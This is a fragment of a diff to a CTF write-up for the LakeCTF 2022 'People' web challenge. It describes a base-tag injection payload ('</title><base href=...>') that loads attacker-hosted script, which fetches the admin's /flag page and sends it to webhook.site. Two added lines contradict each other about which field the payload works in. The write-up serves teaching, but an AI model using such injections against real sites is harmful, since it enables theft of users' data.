NUSGreyhats/NUSGreyhats.github.io/content/posts/writeups/[LAKECTF 2022] People.md

     - "8080:8080"
 ```

-In docker, we can reference the ip of a container by using their container name.
+In docker, we can reference the hostname of a container by using their container name.
 The admin bot visits `web:8080` as that is the configuration set in the `docker-compose.yml` file as shown above.
 So in this case, my script prompts a get request to `web:8080/flag` instead of the full url.

 After that the request is attached as a query parameter to the base url of my webhook site and the page was subsequently redirected to it.

 The github pages is available at [payload.jh123x.com](http://payload.jh123x.com/).
 It was time to inject my base and see the result on [webhook.site](https://webhook.site/).

 The payload that I used for the base injection is shown below and the github link upload is hosted at that url.
+This payload was only injected into the lab field.

+This payload will work if you inject it into either of the fields

 ```html
 </title><base href="http://payload.jh123x.com/" />